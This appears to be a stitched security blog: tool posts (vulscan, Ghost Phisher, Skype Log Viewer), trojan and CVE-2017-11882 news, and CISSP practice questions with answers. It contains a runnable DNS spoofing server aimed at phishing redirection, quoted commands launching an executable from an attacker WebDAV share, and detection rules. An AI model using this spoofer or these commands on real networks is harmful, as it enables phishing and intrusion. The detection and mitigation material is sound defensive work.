[Tool] vulscan – Vulnerability scanning for Nmap

Vulscan is a module that extends nmap's capabilities so it can perform vulnerability scans.



The nmap -sV option enables per-service version detection, and the product and version it reports are what vulscan uses to look up possible flaws. The lookups are made against offline copies of vulnerability databases (VulDB among them), so no network access to the database is needed during the scan.

At the moment the following databases come pre-installed:

Installation:

To install, just copy the files into the folder:


Nmap\scripts\vulscan\*

Usage:

The most basic command, which starts a simple vulnerability scan, is:

nmap -sV --script=vulscan/vulscan.nse www.example.com
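Because vulscan matches purely on the version string that -sV reports, its output is a list of candidates rather than confirmed findings, and a scan of a few hosts quickly produces hundreds of lines to triage. The parser below is an added example written for this page, not part of vulscan or nmap: it reads the XML that nmap writes with -oX and returns the vulscan matches per open service. The XML is a constructed sample whose host, products, IDs and titles are invented; its shape follows nmap's output (newlines inside the script "output" attribute are written as &#xa;) and vulscan's convention of one "[id] title" line per match under a database heading.

```python
import re
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed sample of "nmap -sV --script=vulscan/vulscan.nse -oX out.xml" output.
# Host, products, IDs and titles are invented; the layout follows nmap's XML, in which
# newlines inside the script "output" attribute are encoded as &#xa;.
SAMPLE_XML = (
    '<?xml version="1.0"?>'
    '<nmaprun scanner="nmap" args="nmap -sV --script=vulscan/vulscan.nse -oX out.xml 192.0.2.10">'
    '<host><status state="up"/><address addr="192.0.2.10" addrtype="ipv4"/><ports>'
    '<port protocol="tcp" portid="22"><state state="open"/>'
    '<service name="ssh" product="OpenSSH" version="7.2p2"/>'
    '<script id="vulscan" output="VulDB - https://vuldb.com:&#xa;'
    '[11111] OpenSSH 7.2 example issue&#xa;[11112] OpenSSH 7.2 another example issue&#xa;&#xa;'
    'MITRE CVE - https://cve.mitre.org:&#xa;[CVE-0000-0001] example entry for OpenSSH 7.2&#xa;"/>'
    '</port>'
    '<port protocol="tcp" portid="80"><state state="open"/>'
    '<service name="http" product="Apache httpd" version="2.4.7"/>'
    '<script id="vulscan" output="VulDB - https://vuldb.com:&#xa;[22221] Apache 2.4.7 example issue&#xa;&#xa;'
    'MITRE CVE - https://cve.mitre.org:&#xa;[CVE-0000-0002] example entry for Apache httpd 2.4.7&#xa;'
    '[CVE-0000-0003] another example entry&#xa;"/>'
    '</port>'
    '<port protocol="tcp" portid="443"><state state="filtered"/><service name="https"/></port>'
    '</ports></host></nmaprun>'
)

# One vulscan match: "[identifier] title"
FINDING_RE = re.compile(r"^\[([^\]]+)\]\s+(.*)$")


def parse_vulscan_output(text):
    """Split one vulscan script output into (database, identifier, title) tuples."""
    findings = []
    database = None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        match = FINDING_RE.match(line)
        if match:
            findings.append((database, match.group(1), match.group(2)))
        elif line.endswith(":"):
            # Database heading, e.g. "VulDB - https://vuldb.com:" -> "VulDB"
            database = line[:-1].split(" - ")[0]
    return findings


def parse_nmap_xml(xml_text):
    """Map (address, port, protocol) -> {"service": ..., "findings": [...]} for open ports."""
    root = ET.fromstring(xml_text)
    results = {}
    for host in root.iter("host"):
        address = host.find("address")
        addr = address.get("addr") if address is not None else "?"
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # vulscan only has something to say about open services
            svc = port.find("service")
            service = "unknown"
            if svc is not None:
                service = " ".join(filter(None, [svc.get("product"), svc.get("version")]))
            entry = {"service": service, "findings": []}
            for script in port.findall("script"):
                if script.get("id") == "vulscan":
                    entry["findings"].extend(parse_vulscan_output(script.get("output", "")))
            results[(addr, int(port.get("portid")), port.get("protocol"))] = entry
    return results


def count_by_database(results):
    """How many candidate matches each database contributed (a rough triage metric)."""
    counts = defaultdict(int)
    for entry in results.values():
        for database, _identifier, _title in entry["findings"]:
            counts[database] += 1
    return dict(counts)


if __name__ == "__main__":
    for (addr, port, proto), entry in parse_nmap_xml(SAMPLE_XML).items():
        print(f"{addr}:{port}/{proto} {entry['service']}: {len(entry['findings'])} candidates")
```

Treat every line the parser returns as a hypothesis to confirm: a distribution that backports fixes without bumping the version string will light up every entry for that version, so the list is a starting point for manual verification, not a report.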

Download & useful links:

You can download the vulscan add-on here.
You can also read more about the project and its other features on the GitHub page.
Sunday, 19 November 2017

Terdot trojan - Banking malware gains the ability to steal social network and e-mail accounts

Security researchers have discovered a new, sophisticated strain of malware based on the notorious Zeus banking trojan that steals more than just bank account details.

Known as Terdot, the banking trojan has been around since mid-2016 and was initially designed to operate as a proxy for Man-in-the-Middle (MitM) attacks, to steal browsing information such as stored credit card data and login credentials, and to inject malicious HTML code into the web pages the victim visits.

However, researchers at the security firm Bitdefender found that the trojan has now been revamped with new espionage capabilities, such as leveraging open source tools to spoof SSL certificates in order to gain access to social network and e-mail accounts, and even to post on behalf of infected users.

Terdot does this through a highly customised MitM proxy that lets the malware intercept any traffic on an infected computer.

In addition, the new Terdot variant has an automatic update feature that lets the malware download and execute files on the operator's request.

Terdot has typically targeted the websites of Canadian banking institutions such as Royal Bank, Banque Nationale, PCFinancial, Desjardins, BMO (Bank of Montreal) and Scotiabank, among others.

According to more recent analysis, however, Terdot can also target social networks, including Facebook, Twitter, Google Plus and YouTube, as well as e-mail services, including Gmail, Live, Hotmail, Outlook and Yahoo Mail.

Interestingly, the malware avoids collecting data related to Russia's largest social network, VKontakte (vk.com), Bitdefender noted. This suggests that the actors behind this new variant may be based in Eastern Europe.

The trojan is distributed mainly through compromised websites via the Sundown Exploit Kit, but it has also been seen spreading through malicious e-mails that masquerade as a PDF.

When the victim clicks the fake PDF, obfuscated JavaScript runs and then downloads and executes the malware file. To evade detection it uses a complex chain of droppers, injections and downloaders that fetch Terdot in pieces.

Once a machine is infected, the trojan injects itself into the browser process to redirect connections through its own web proxy, sniff the traffic and inject spyware. It can also steal authentication data by inspecting the victim's requests or by injecting JavaScript spyware into the responses.

Terdot can also get around the protection offered by TLS (Transport Layer Security) by generating its own Certificate Authority (CA) and issuing a certificate for every domain the victim visits.

All data the victim sends to a bank account or social network can be intercepted and modified by Terdot in real time, which can also let it spread by posting bogus links from other social network accounts.

Bitdefender has been tracking the new Terdot variant since it resurfaced in October of last year.

For more details on the new threat, see the technical paper published by Bitdefender.

[Tool] Ghost Phisher – Phishing attack tool with a graphical interface

Ghost Phisher is a wireless and Ethernet security auditing tool written in Python that uses the Python Qt GUI library for its interface. The program can emulate access points and lets you deploy several kinds of internal network servers for networking, penetration testing and phishing attacks.

The tool ships with a fake DNS server, a fake DHCP server and a fake HTTP server, and includes a built-in area that automatically captures credentials submitted through HTTP forms and logs them to a database. It can be used as a honeypot, and also for DHCP request, DNS request or phishing attacks.

Ghost Phisher features:

  • HTTP server
  • DNS server (RFC 1035)
  • DHCP server (RFC 2131)
  • Web page hosting and credential capture (phishing)
  • Wi-Fi access point emulator
  • Session hijacking (passive and Ethernet modes)
  • ARP cache poisoning (MitM and DoS)
  • Penetration using Metasploit bindings
  • Automatic credential logging to an SQLite database
  • Update support
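To show what the fake DNS server in the list above actually does on the wire, here is a minimal RFC 1035 responder. It is an added example written for this page, not Ghost Phisher's own code: it parses an A query and answers it with whatever address the operator chooses (10.0.0.1 below is an assumed phishing host on the rogue access point), which is all that is needed to steer a victim's lookup of bank.example.com to a phishing page. The query and the response are both built and parsed in the block, so it runs without a network.

```python
import socket
import struct


def encode_name(name):
    """Encode "bank.example.com" as DNS labels: 4bank7example3com0."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(msg, offset):
    """Decode a name at offset, following a compression pointer (RFC 1035 4.1.4) if present."""
    labels = []
    while True:
        length = msg[offset]
        if length == 0:
            offset += 1
            break
        if length & 0xC0 == 0xC0:  # two-byte pointer to an earlier occurrence of the name
            pointer = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            pointed, _ = decode_name(msg, pointer)
            labels.append(pointed)
            offset += 2
            break
        labels.append(msg[offset + 1:offset + 1 + length].decode("ascii"))
        offset += 1 + length
    return ".".join(labels), offset


def build_query(txid, name, qtype=1):
    """A standard recursive query (flags 0x0100) for one question, type A by default."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def parse_query(msg):
    txid, flags, _qd, _an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    name, offset = decode_name(msg, 12)
    qtype, qclass = struct.unpack("!HH", msg[offset:offset + 4])
    return {"txid": txid, "flags": flags, "name": name,
            "qtype": qtype, "qclass": qclass, "question_end": offset + 4}


def build_spoofed_response(query_msg, spoof_ip, ttl=60):
    """Answer any A query with spoof_ip; other types get an empty NOERROR answer."""
    q = parse_query(query_msg)
    question = query_msg[12:q["question_end"]]
    flags = 0x8180  # QR=1 (response), RD=1, RA=1, RCODE=0
    if q["qtype"] != 1:
        return struct.pack("!HHHHHH", q["txid"], flags, 1, 0, 0, 0) + question
    header = struct.pack("!HHHHHH", q["txid"], flags, 1, 1, 0, 0)
    # Answer name is a pointer to offset 12 (the question name), type A, class IN, 4-byte rdata
    answer = b"\xC0\x0C" + struct.pack("!HHIH", 1, 1, ttl, 4) + socket.inet_aton(spoof_ip)
    return header + question + answer


def parse_response(msg):
    """Parse the header and answer section; A records are returned as dotted quads."""
    txid, flags, _qd, ancount, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    _name, offset = decode_name(msg, 12)
    offset += 4  # skip qtype/qclass
    answers = []
    for _ in range(ancount):
        name, offset = decode_name(msg, offset)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
        offset += 10
        rdata = msg[offset:offset + rdlen]
        offset += rdlen
        answers.append((name, rtype, ttl, socket.inet_ntoa(rdata) if rtype == 1 else rdata))
    return {"txid": txid, "flags": flags, "answers": answers}


def serve(bind_ip, spoof_ip, port=53):
    """Blocking UDP loop answering every query with spoof_ip (port 53 needs root)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((bind_ip, port))
    while True:
        data, client = sock.recvfrom(512)
        sock.sendto(build_spoofed_response(data, spoof_ip), client)


if __name__ == "__main__":
    serve("0.0.0.0", "10.0.0.1")  # assumed phishing host on the rogue access point
```

Plain DNS carries no authentication, so the victim's stub resolver accepts this answer as long as the transaction ID and question match what it sent; on a rogue access point the attacker also hands out the resolver address via DHCP, so no guessing is needed. Only DNSSEC validation, or encrypted DNS to a trusted resolver, defeats the redirect, and even then a site the browser knows through HSTS will fail the TLS handshake at the phishing host rather than load the page.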

Prerequisites:

The following dependencies can be installed on Debian-based systems with the Debian package manager ("apt-get install program"), or by downloading and installing them manually.
  • Aircrack-NG
  • Python-Scapy
  • Python Qt4
  • Python
  • Subversion
  • Xterm
  • Metasploit Framework 
You can download the Ghost Phisher tool here: ghost-phisher-master.zip

You can also read more about the project on the GitHub page.

17-year-old MS Office vulnerability lets attackers install malware without user interaction

While the world is still recovering from the unpatched DDE feature in the Microsoft Office suite, researchers have uncovered another serious issue in a different Office component, one that lets an attacker install malware remotely.

The vulnerability is a memory corruption issue present in every version of Microsoft Office released in the last 17 years, including Microsoft Office 365, and it works against all versions of the Windows operating system, including the latest Windows 10 Creators Update.

Discovered by security researchers at Embedi, the vulnerability leads to remote code execution, allowing a remote, unauthenticated attacker to run malicious code on the target system with no user interaction required beyond opening a malicious document.

The vulnerability, tracked as CVE-2017-11882, lives in the executable EQNEDT32.EXE, the MS Office component responsible for inserting and editing equations (OLE objects) in documents.

Because of improper memory operations, the component does not handle objects in memory correctly, and the resulting corruption lets an attacker execute malicious code in the context of the current user.

EQNEDT32.EXE was introduced seventeen years ago in Microsoft Office 2000 and has been kept in every version released after Microsoft Office 2007 to preserve compatibility with documents from older versions.

DEMONSTRATION: The vulnerability allows full control of a system

Exploiting this vulnerability requires opening a specially crafted malicious file with an affected version of Microsoft Office or Microsoft WordPad.

It can yield full control of a system when combined with a Windows kernel privilege escalation vulnerability (such as CVE-2017-11847).

A possible scenario:

Explaining the reach of the vulnerability, the Embedi researchers suggested several possible scenarios:

"By inserting several OLE objects that exploited the described vulnerability, it was possible to execute an arbitrary sequence of commands (for example, to download a file from the Internet and execute it)."

"One of the easiest ways to execute arbitrary code is to launch an executable file from a compromised WebDAV server."

"Nevertheless, an attacker can also use the vulnerability to execute shell commands such as cmd.exe /c start \\attacker_ip\ff. This command can be used to start a WebClient."

"After that, the attacker can run an executable from the WebDAV server using the command \\attacker_ip\ff\1.exe."
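The WebDAV launch described in the quoted scenario leaves a recognisable trail in process-creation telemetry: EQNEDT32.EXE spawning a child process, and cmd.exe or a new process being started from a \\host\share UNC path. The detection below is an added example written for this page (not from Embedi or Microsoft). The events are constructed Sysmon-style records with an invented attacker address, 192.0.2.7, and they are simplified in one respect: in real telemetry EQNEDT32.EXE is usually started through DCOM, so its parent is typically svchost.exe rather than WINWORD.EXE, which is exactly why the rule keys on EQNEDT32.EXE as a parent rather than as a child.

```python
import re

# Constructed Sysmon-style (Event ID 1) process-creation events; paths and the attacker
# address 192.0.2.7 are invented for illustration.
EQ = r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
WORD = r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    # Word loads the Equation Editor for a legitimate equation: benign
    {"ts": "2017-11-19T10:00:01", "parent_image": WORD, "image": EQ,
     "cmdline": f'"{EQ}" -Embedding'},
    # Stage 1 of the quoted scenario: the Equation Editor spawns cmd.exe to start the WebClient
    {"ts": "2017-11-19T10:00:02", "parent_image": EQ, "image": CMD,
     "cmdline": r"cmd.exe /c start \\192.0.2.7\ff"},
    # Stage 2: an executable is launched straight from the WebDAV share
    {"ts": "2017-11-19T10:00:03", "parent_image": CMD,
     "image": r"\\192.0.2.7\ff\1.exe", "cmdline": r"\\192.0.2.7\ff\1.exe"},
    # A user running a local command from Explorer: benign
    {"ts": "2017-11-19T10:05:00", "parent_image": r"C:\Windows\explorer.exe",
     "image": CMD, "cmdline": r"cmd.exe /c dir C:\Users"},
]

# \\host\share where host is a name or address
UNC_RE = re.compile(r"\\\\[\w.\-]+\\[\w$.\-]+")


def basename(path):
    """Lower-cased file name of a Windows path (handles UNC and forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (timestamp, rule, child image) for each event that matches a rule."""
    alerts = []
    for ev in events:
        parent = basename(ev["parent_image"])
        image = basename(ev["image"])
        # Rule 1: the Equation Editor never needs to spawn anything on its own.
        if parent == "eqnedt32.exe":
            alerts.append((ev["ts"], "eqnedt32_child_process", image))
        # Rule 2: execution from a UNC path, or cmd.exe told to "start" one (WebDAV staging).
        if ev["image"].startswith("\\\\") or (image == "cmd.exe" and UNC_RE.search(ev["cmdline"])):
            alerts.append((ev["ts"], "unc_path_execution", image))
    return alerts


if __name__ == "__main__":
    for ts, rule, image in detect(SAMPLE_EVENTS):
        print(f"{ts} {rule}: {image}")
```

Rule 1 is the high-confidence signal and is worth alerting on by itself; rule 2 will also fire on legitimate administrative use of network shares, so it is better used as context or correlated with the first. After applying the kill-bit mitigation described further down, EQNEDT32.EXE should no longer appear as a parent at all, which makes rule 1 hits after that point especially interesting.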

How to protect against this vulnerability:

With this month's Patch Tuesday release, Microsoft addressed the vulnerability by changing how the affected software handles objects in memory.

Users are therefore strongly advised to apply the November security patches as soon as possible to keep hackers and cyber criminals from taking control of their computers.

Since this component has a history of security problems that are easy to exploit, disabling it altogether may be the best way to keep your systems safe.

Users can run the following commands to disable the component's registration in the Windows Registry (0x400 in Compatibility Flags is the COM kill bit, which stops Office from loading the Equation Editor control):

On 32-bit Windows:

reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400


On 64-bit Windows (32-bit Office, which lives under Wow6432Node):

reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400


In addition, users should also enable Protected View (the Microsoft Office sandbox) to prevent active content (OLE / ActiveX / macros) from executing.

Wednesday, 15 November 2017

[Tool] Skype Log Viewer - Viewing Skype logs on Windows

The Skype Log Viewer tool lets you download and view the history and log files of a Skype account on Windows without having to use the Skype client itself.

What does Skype Log Viewer do?

This program lets you view all your Skype conversation logs and then easily export them as text files. It also organises them correctly by conversation and makes sure group conversations are not mixed up with one-to-one conversations.

The project is open source and free to use; it has been updated over time, the latest version dating from April 2017.

For anyone doing digital forensics, this is a tool to keep in your toolkit!

Skype Log Viewer features:

  • Downloads the Skype logs
  • Support for corrupted databases
  • Several export formats
  • Organises by conversation
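To illustrate what "organises by conversation" means on the underlying data, the script below reads a Skype main.db with Python's sqlite3 module and exports each conversation as time-ordered text lines, the way an examiner would want them. It is an added example written for this page, not Skype Log Viewer's own code. It assumes a simplified reconstruction of two of main.db's tables (Conversations with id/displayname/type and Messages with convo_id/author/from_dispname/timestamp/body_xml); the real file has many more columns, and treating type 2 as a group chat is an assumption. The accounts and messages are constructed.

```python
import re
import sqlite3
from datetime import datetime, timezone
from html import unescape

# Simplified reconstruction of two tables from Skype's classic main.db (assumption: the
# real file carries many more columns). Account names and messages are constructed.
SCHEMA = """
CREATE TABLE Conversations (id INTEGER PRIMARY KEY, displayname TEXT, type INTEGER);
CREATE TABLE Messages (
    id INTEGER PRIMARY KEY, convo_id INTEGER, author TEXT, from_dispname TEXT,
    timestamp INTEGER, body_xml TEXT);
"""
SAMPLE_CONVERSATIONS = [(1, "alice.example", 1), (2, "Project Chat", 2)]
SAMPLE_MESSAGES = [
    (10, 1, "bob.example", "Bob", 1510740000, "hi alice"),
    (11, 1, "alice.example", "Alice", 1510740060, 'hi bob <ss type="smile">:)</ss>'),
    (12, 2, "carol.example", "Carol", 1510740120,
     'meeting at <a href="http://intranet.example/room">room</a> 3'),
    # Stored after a later message: the export must sort by time, not by row order.
    (13, 2, "bob.example", "Bob", 1510739900, "earlier message, stored out of order"),
]

TAG_RE = re.compile(r"<[^>]+>")


def open_sample_db():
    """Build the constructed database in memory; for a real case open a copy of main.db."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO Conversations VALUES (?,?,?)", SAMPLE_CONVERSATIONS)
    conn.executemany("INSERT INTO Messages VALUES (?,?,?,?,?,?)", SAMPLE_MESSAGES)
    return conn


def integrity_ok(conn):
    """SQLite's own consistency check; a damaged copy reports errors instead of 'ok'."""
    return conn.execute("PRAGMA integrity_check").fetchone()[0] == "ok"


def clean_body(body_xml):
    """Strip Skype's inline markup (emoticons, links) and decode entities."""
    return unescape(TAG_RE.sub("", body_xml or "")).strip()


def export_conversations(conn):
    """Return {conversation label: [formatted line, ...]} with lines in timestamp order."""
    out = {}
    rows = conn.execute("""
        SELECT c.displayname, c.type, m.timestamp, m.from_dispname, m.author, m.body_xml
        FROM Messages m JOIN Conversations c ON c.id = m.convo_id
        ORDER BY m.convo_id, m.timestamp, m.id""")
    for displayname, ctype, ts, dispname, author, body in rows:
        # Skype stores Unix epoch seconds; render in UTC so lines from different hosts line up
        when = datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
        kind = "group" if ctype == 2 else "1:1"  # assumption about the type column
        label = f"{displayname} [{kind}]"
        out.setdefault(label, []).append(f"{when}  {dispname} ({author}): {clean_body(body)}")
    return out


if __name__ == "__main__":
    db = open_sample_db()
    print("integrity:", "ok" if integrity_ok(db) else "DAMAGED")
    for label, lines in export_conversations(db).items():
        print(f"== {label}")
        print("\n".join(lines))
```

Always work on a copy of main.db and never open the live file while Skype is running: the client keeps the database open and its write-ahead log may hold messages that are not yet in the main file.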




You can download Skype Log Viewer here:

Compiled version: SkypeLogViewerLGGv1.3.exe
Source code: skype-log-viewer-v1.3.zip

You can read more about the project on the GitHub page.
Thursday, 18 May 2017

(ISC)² CISSP - Certified Information Systems Security Professional - A little help with the CISSP certification questions - Part 6

Sixth part of the CISSP question dump

Before the exam it is always worth having some reading material, in addition to attending the course:

https://umeshume.files.wordpress.com/2013/03/mcgraw-hill-osborne-media-cissp-all-in-one-exam-guide-6th-edition-2012.pdf

Take a careful look at this link: http://opensecuritytraining.info/CISSP-Main.HTML



Question:
Which of the following statements is false?

A.A disaster recovery team’s primary task is to restore critical business functions at the alternate backup processing site.
B.A disaster salvage team’s task is to ensure that the primary site returns to normal processing conditions.
C.The disaster recovery plan should include how the company will return from the alternate site to the primary site.
D.When returning to the primary site, the most critical applications should be brought back first.

Answer:
D.When returning to the primary site, the most critical applications should be brought back first.

Explanation:
When the primary site is ready to receive operations again, less critical systems should be brought back first to ensure that everything is running smoothly before returning critical systems, which are already operating normally at the recovery site.

Question:
The least expensive and most difficult to test computer recovery site is a:

A.Non-mobile hot site
B.Mobile hot site
C.Warm site
D.Cold site

Answer:
D.Cold site

Explanation:
The cold site’s lack of equipment reduces its annual cost, but complicates testing or recovery because the equipment must be obtained, shipped, and installed at the site prior to use.

Question:
_______________ includes activities to test and validate system capability and functionality and outlines actions that can be taken to return the system to normal operating condition and prepare the system against future outages.

A.Activation
B.Recovery
C.Reconstitution
D.Validation

Answer:
C.Reconstitution

Explanation:
The Activation/Notification Phase describes the process of activating the plan based on outage impacts and notifying recovery personnel. The Recovery Phase details a suggested course of action for recovery teams to restore system operations at an alternate site or using contingency capabilities. The final phase, Reconstitution, includes activities to test and validate system capability and functionality and outlines actions that can be taken to return the system to normal operating condition and prepare the system against future outages.

Question:
What is a main advantage of using hot sites?

A.Costs are relatively low.
B.They can be used for an extended amount of time.
C.They do not require that equipment and systems software be compatible with the primary installation being backed up.
D.They can be made ready for operation quickly.

Answer:
D.They can be made ready for operation quickly.

Explanation:
The main advantage of hot sites is that they can normally be made ready for operation within hours.

Question:
A business continuity plan is an example of a __________ control.

A.Corrective
B.Detective
C.Preventive
D.Collective

Answer:
A.Corrective

Explanation:
Business continuity plans are designed to minimize the damage inflicted by an event and to facilitate restoration of the organization to its full operational capacity.

Question:
Business continuity plans are required for:

A.All areas of the enterprise
B.Financial resources and information processing
C.Operating areas of the enterprise
D.Marketing, finance, and information processing

Answer:
A.All areas of the enterprise

Explanation:
Business continuity plans are required for all parts of an enterprise.

Question:
In disaster recovery planning, what is the recovery point objective?

A.The point to which application data must be recovered to resume business operations
B.The maximum elapsed time required to complete recovery of application data
C.The point to which application data must be recovered to resume system operations
D.The point to which information system must be operational at an alternate site

Answer:
C.The point to which application data must be recovered to resume system operations

Explanation:
The Recovery Point Objective (RPO) is the point in time to which you must recover data as defined by your organization. This is generally a definition of what an organization determines is an "acceptable loss" in a disaster situation. If the RPO of a company is 2 hours and the time it takes to get the data back into production is 5 hours, the RPO is still 2 hours. Based on this RPO the data must be restored to within 2 hours of the disaster.

Question:
In contingency planning, the first step is:

A.Perform a hardware backup
B.Perform a data backup
C.Perform an operating systems software backup
D.Perform an application software backup

Answer:
B.Perform a data backup

Explanation:
A data backup is the first step in contingency planning. Without data, there is nothing to process.

Question:
The most devastating business interruptions are the result of loss of:

A.Hardware/software
B.Data
C.Communication links
D.Applications

Answer:
B.Data

Explanation:
Loss of data can cause the most damage to an enterprise in the short and long run.

Question:
The Information Systems Contingency Plan does not include which of the following?

A.Information on system recovery
B.Information on roles and responsibilities
C.Assessment results
D.Testing procedures

Answer:
C.Assessment results

Explanation:
The Information Systems Contingency Plan provides key information needed for system recovery, including roles and responsibilities, inventory information, assessment procedures, detailed recovery procedures, and testing of a system.



Parte 1: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems.html
Parte 2: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_1.HTML
Parte 3: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_2.HTML
Parte 4: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_5.html
Parte 5: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_8.html

(ISC)² CISSP - Certified Information Systems Security Professional - A little help with the CISSP certification questions - Part 5

Fifth part of the CISSP question dump

Before the exam it is always worth having some reading material, in addition to attending the course:

https://umeshume.files.wordpress.com/2013/03/mcgraw-hill-osborne-media-cissp-all-in-one-exam-guide-6th-edition-2012.pdf

Take a careful look at this link: http://opensecuritytraining.info/CISSP-Main.HTML



Question:
Business continuity plans address all of the following except:

A.Critical servers used on the company's LAN
B.The most critical devices housed in the main data center
C.Individual workstations that are used by operations personnel
D.The protection of cold sites at a remote location

Answer:
D.The protection of cold sites at a remote location

Explanation:
A BCP does not address the protection of cold sites at remote location.

Question:
Organizations should not view disaster recovery as:

A.A committed expense
B.A discretionary expense
C.An enforcement of legal statutes
D.Compliance with regulations

Answer:
B.A discretionary expense

Explanation:
Businesses need to treat disaster recovery planning as a committed expense, much like insurance is a requirement. In many sectors, disaster recovery is a legal requirement.

Question:
Which of the following best describes a continuity of operations plan?

A.Establishes senior management and a headquarters after a disaster. Outlines roles and authorities, orders of succession, and individual role tasks.
B.Plan for systems, networks, and major applications recovery procedures after disruptions. A contingency plan should be developed for each major system and application.
C.Includes internal and external communications structure and roles. Identifies specific individuals who will communicate with external entities. Contains predeveloped statements that are to be released.
D.Focuses on malware, hackers, intrusions, attacks, and other security issues. Outlines procedures for incident response.

Answer:
A.Establishes senior management and a headquarters after a disaster. Outlines roles and authorities, orders of succession, and individual role tasks.

Explanation:
The continuity of operations plan establishes senior management and a headquarters after a disaster. It outlines roles and authorities, orders of succession, and individual role tasks.

Question:
Which of the following best describes a parallel test?

A.A scenario is established and individuals are gathered to go through each step of the plan.
B.Copies of the plan are handed out to representatives from each functional area.
C.Some systems are moved to the alternate site and installed to test processing procedures and compatibility.
D.Management gathers and goes through a structured walk-through test.

Answer:
C.Some systems are moved to the alternate site and installed to test processing procedures and compatibility.

Explanation:
When a parallel test is performed, the critical systems are taken to the site where they would need to perform in an actual disaster.

Question:
Which of the following is not a purpose to develop and implement a disaster recovery plan?

A.Provides procedures for emergency responses
B.Extends backup operations to include more than just backing up data
C.Provides steps for a post-disaster recovery
D.Outlines business functions and systems

Answer:
D.Outlines business functions and systems

Explanation:
The disaster recovery plan does not outline business functions and systems. Those are handled in the business impact analysis.

Question:
A reciprocal agreement is best described how?

A.A site that has some computers and environmental controls
B.A site that has fully redundant systems, software, and configurations
C.A site that is in use by another company already
D.An agreement that is enforceable

Answer:
C.A site that is in use by another company already

Explanation:
A reciprocal agreement is when one company promises another company that it can move in if a disaster hits. This agreement is not enforceable.

Question:
A business impact analysis (BIA) does not typically include:

A.Identifying the type and quantity of resources required for the recovery
B.Identifying critical business processes and the dependencies between them
C.Identifying organizational risks
D.Developing a mission statement

Answer:
D.Developing a mission statement

Explanation:
The development of a mission statement is normally performed before the BIA.

Question:
An off-site information processing facility:

A.Should have the same degree of physical access restrictions as the primary processing site
B.Should be located close to the originating site so that it can quickly be made operational
C.Should be easily identified from the outside for easy emergency access
D.Need not have the same level of environmental monitoring as the originating site since this would be cost prohibitive

Answer:
A.Should have the same degree of physical access restrictions as the primary processing site

Explanation:
An off-site information processing facility should have the same amount of physical control as the originating site.

Question:
Out of the following steps in the development of a disaster recovery plan, which is the second step?

A.Develop an information system contingency plan
B.Create contingency strategies
C.Conduct the business impact analysis (BIA)
D.Ensure plan testing, training, and exercises

Answer:
C.Conduct the business impact analysis (BIA)

Explanation:
The seven progressive steps are designed to be integrated into each stage of the system development life cycle.
- Develop the contingency planning policy statement. A formal policy provides the authority and guidance necessary to develop an effective contingency plan.
- Conduct the business impact analysis (BIA). The BIA helps identify and prioritize information systems and components critical to supporting the organization's mission/business functions. A template for developing the BIA is provided to assist the user.
- Identify preventive controls. Measures taken to reduce the effects of system disruptions can increase system availability and reduce contingency life cycle costs.
- Create contingency strategies. Thorough recovery strategies ensure that the system may be recovered quickly and effectively following a disruption.
- Develop an information system contingency plan. The contingency plan should contain detailed guidance and procedures for restoring a damaged system unique to the system's security impact level and recovery requirements.
- Ensure plan testing, training, and exercises. Testing validates recovery capabilities, whereas training prepares recovery personnel for plan activation and exercising the plan identifies planning gaps; combined, the activities improve plan effectiveness and overall organization preparedness.
- Ensure plan maintenance. The plan should be a living document that is updated regularly.

Question:
An organization wants to gain a common understanding of functions that are critical to its survival. Which of the following will help the most?

A.Risk assessment
B.Business assessment
C.Disaster recovery plan
D.Business impact analysis

Answer:
D.Business impact analysis

Explanation:
A business impact analysis (BIA) is an assessment of an organization’s business functions to develop an understanding of their criticality, recovery time objectives, and resources needed.


Parte 1: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems.html
Parte 2: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_1.HTML
Parte 3: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_2.HTML
Parte 4: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_5.html
Parte 6: http://e-forense.blogspot.com/2014/05/isc-cissp-certified-information-systems_9.html

(ISC)² CISSP - Certified Information Systems Security Professional - A little help with the CISSP certification questions - Part 4

Fourth part of the CISSP question dump

Before the exam it is always worth having some reading material, in addition to attending the course:

- https://umeshume.files.wordpress.com/2013/03/mcgraw-hill-osborne-media-cissp-all-in-one-exam-guide-6th-edition-2012.pdf

Take a careful look at this link: http://opensecuritytraining.info/CISSP-Main.HTML


Question:
Which is not a task for senior management in disaster recovery?

A.Approve of final plans
B.Oversee budget
C.Drive all phases of plan
D.Implement the plans themselves

Answer:
D.Implement the plans themselves

Explanation:
